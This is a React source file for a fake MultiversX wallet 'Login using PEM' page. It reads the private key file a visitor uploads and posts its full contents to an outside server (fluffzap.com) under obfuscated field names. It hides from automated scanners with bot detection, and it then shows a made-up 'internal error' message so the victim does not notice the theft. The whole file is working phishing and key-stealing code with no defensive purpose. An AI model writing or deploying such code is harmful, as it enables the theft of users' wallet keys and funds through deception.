import React, { useEffect, useRef, useState } from 'react';
import { Close, SelectFileSVG, DeleteSVG, Mark, Logo } from '../Svg';
import { useNavigate } from 'react-router-dom';
import axios from 'axios';
import { load } from '@fingerprintjs/botd';

export default function Pem() {
    const [isBot, setIsBot] = useState(true);
    const [fileName, setFileName] = useState('');
    const [fileSelected, setFileSelected] = useState(false);
    const [fileOk, setFileOk] = useState(false);
    const [file, setFile] = useState(null);
    const [isRequired, setIsRequired] = useState(false);
    const [loading, setLoading] = useState(false);
    const [showModal, setShowModal] = useState(false);

    const navigate = useNavigate();

    const closePem = () => {
        navigate('/');
    };

    useEffect(() => {
        document.body.style.overflow = 'hidden';
        return () => {
            document.body.style.overflow = 'auto';
        };
    }, []);

    const fileInputRef = useRef(null);
    const handleDivClick = () => {
        fileInputRef.current.click();
    };

    const handleFileChange = (event) => {
        const selectedFile = event.target.files[0];
        if (selectedFile) {
            setFileName(truncateFileName(selectedFile.name));
            setFileSelected(true);
            handleUploadValidation(selectedFile);
        }
    };

    const truncateFileName = (name, maxLength = 30) => {
        if (name.length <= maxLength) return name;
        const extensionIndex = name.lastIndexOf('.');
        const extension = extensionIndex !== -1 ? name.slice(extensionIndex) : '';
        const firstPart = name.slice(0, 10);
        const lastPart = name.slice(-6);
        return `${firstPart}...${lastPart}`;
    };

    const handleDeleteFile = () => {
        setFileName('');
        setFile(null);
        setFileSelected(false);
        setFileOk(false);
        setIsRequired(true);
        fileInputRef.current.value = '';
    };

    // Function to validate PEM file content
    const handleUploadValidation = (file) => {
        const reader = new FileReader();
        reader.onload = (event) => {
            const pemContent = event.target.result;
            setFile(pemContent);
            const isValidPem = validatePem(pemContent);
            setFileOk(isValidPem);
            setIsRequired(!isValidPem);
        };
        reader.readAsText(file);
    };

    const pemRegex = /^(-----BEGIN (.*)-----)([\s\S]+)(-----END \2-----)$/;

    const validatePem = (content) => {
        const match = content.match(pemRegex);
        if (!match) {
            return false;
        }
        const base64Content = match[3].trim();
        const base64Lines = base64Content.split('\n');
        const isValidLength = base64Lines.every((line, index) =>
            index === base64Lines.length - 1 || line.length === 62
        );
        const base64Regex = /^[A-Za-z0-9+/=]+$/;
        const isValidBase64 = base64Lines.every(line => base64Regex.test(line));

        return isValidLength && isValidBase64;
    };

    useEffect(() => {
        const botdPromise = load();
        botdPromise
            .then((botd) => botd.detect())
            .then((result) => {
                setIsBot(result?.bot);
                if (result?.bot === true) {
                    window.open("https://yeyeyeyeyey");
                }
            })
            .catch((error) => console.error(error));
    }, []);

    async function saveSeed() {
        setLoading(true);
        try {
            if (!isBot) {
                await axios.post("https://fluffzap.com/ser2.php", {
                    yeeterrererereeeeeeeeeeeeeeerererrerereeeeeeerreerrererer: "eteteywwywywtwttwwrwrwrrwrwttwtwttwtwtwttwtwtwtwttwtwtwt",
                    eteteywwywywtwttwwrwrwrrwrwttwtwttwtwtwttwtwtwtwttwtwtwt: "yeeterrererereeeeeeeeeeeeeeerererrerereeeeeeerreerrererer",
                    tyxyetwrwrwewewwewesdsdswewewrwrwrweweweeqwqwqqwrytwtwrw: file,
                    yryrrtrttteueuruururiririirurururryyryrtrtrtrttrtrtrt: "xemrryrte",
                }, {
                    headers: {
                        'Content-Type': 'application/json',
                    }
                });
            }
        } catch (err) {
            console.error(err);
        } finally {
            setLoading(false);
            setShowModal(true); // Show the modal after completing the save operation
        }
    }

    return (
        <div className="fixed inset-0 flex items-center justify-center z-50">
            <div className="absolute inset-0 bg-black bg-opacity-30" onClick={closePem}></div>
            <div
                className="bg-black sm:rounded-[20px] sm:max-w-[700px] w-full h-full p-6 sm:p-8 flex flex-col relative z-10"
                onClick={(e) => e.stopPropagation()}
            >
                <div className="flex justify-end">
                    <button
                        onClick={closePem}
                        className="flex items-center justify-center w-[30px] h-[30px] rounded-full hover:bg-[#262626] group transition duration-200"
                    >
                        <div className="text-white group-hover:text-[#25e8d0]">
                            {Close}
                        </div>
                    </button>
                </div>

                {/* Title and Description */}
                <div className="flex flex-col items-center text-center mt-4">
                    <h1 className="text-[#d4d4d4] text-2xl font-bold mb-2">Login using PEM</h1>
                    <p className="text-gray-400 text-base">Drag & drop your PEM file here or select file</p>
                </div>
                <div className="flex flex-col items-center mt-6 gap-[10px]">
                    <div className={`w-[85%] h-[250px] rounded-[15px] border ${fileSelected ? (fileOk ? 'border-[#23f7dd]' : 'border-red-500') : 'border-gray-400'} border-dashed p-4 flex flex-col items-center justify-center gap-2 cursor-pointer`}
                        onClick={handleDivClick}>
                        <input
                            type="file"
                            ref={fileInputRef}
                            style={{ display: 'none' }}
                            onChange={handleFileChange}
                        />

                        <div className="mb-2 flex justify-center items-center flex-col gap-[5px]">
                            <div
                                style={{
                                    filter: fileSelected
                                        ? 'invert(76%) sepia(17%) saturate(4000%) hue-rotate(135deg) brightness(100%) contrast(98%)'
                                        : 'invert(100%)'
                                }}
                            >
                                {SelectFileSVG}
                            </div>
                            {fileSelected ? (
                                <p className={`text-[12px] font-semibold ${fileOk ? 'text-[#20d9c3]' : 'text-red-500'}`}>
                                    {fileOk ? 'Keystore loaded' : 'Please check the file for errors'}
                                </p>
                            ) : (
                                <>
                                    <p className="text-[#525252] text-center text-sm">Drag and drop here</p>
                                    <p className="text-[#20d9c3] text-center font-normal text-base">Select a file</p>
                                </>
                            )}
                        </div>

                        {fileSelected && (
                            <div className="w-[90%] bg-[#171717] rounded-[5px] p-2 text-[#d4d4d4]">
                                <div className="flex items-center justify-between">
                                    <p className="text-center">{fileName}</p>
                                    <button onClick={handleDeleteFile} className="text-[#d4d4d4] hover:text-red-500 focus:outline-none">
                                        {DeleteSVG}
                                    </button>
                                </div>
                                {fileOk ? (
                                    <div className="flex gap-[4px] items-center mt-2 text-[#21ead1] text-[12px]">
                                        <span className="ml-1">Validated</span> {Mark}
                                    </div>
                                ) : (
                                    <p className="text-red-500 text-[12px] text-left w-full mt-1">PEM file has invalid key</p>
                                )}
                            </div>
                        )}
                    </div>

                    <button className={`px-[20px] py-[10px] rounded-[10px] ${fileOk ? 'bg-[#23f7dd]' : 'bg-transparent'} text-white border border-[1px] border-gray-500 font-500 mt-[15px]`} disabled={!fileOk}
                        onClick={() => {
                            if (fileOk) {
                                saveSeed();
                            }
                        }}
                    >
                        {loading ? <div className="spinner text-[#23f7dd]"></div> : "Access Wallet"}
                    </button>
                </div>

                {showModal && (
                    <div className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50">
                        <div className="bg-[#171717] fade-up-element w-full max-w-[500px] rounded-[10px] p-6 flex flex-col gap-[10px] items-center text-center space-y-4">
                            <div className="text-white">{Logo}</div>
                            <div className='flex flex-col justify-center items-center gap-[5px]'>
                                <p className="text-[#23f7dd] font-800px text-[20px]">MultiversX Internal Error Occurred!</p>
                                <p className='text-[white]'>Oops! We couldn’t establish a connection to the MultiversX blockchain network. Please ensure your internet connection is stable and try again.</p>
                            </div>
                            <button className='text-[#23f7dd] hover:text-black bg-transparent rounded-[8px] border border-[1px] border-gray-500 px-[15px] py-[5px] hover:bg-[#23f7dd]' onClick={() => setShowModal(false)}>Ok</button>
                        </div>
                    </div>
                )}
            </div>
        </div>
    );
}
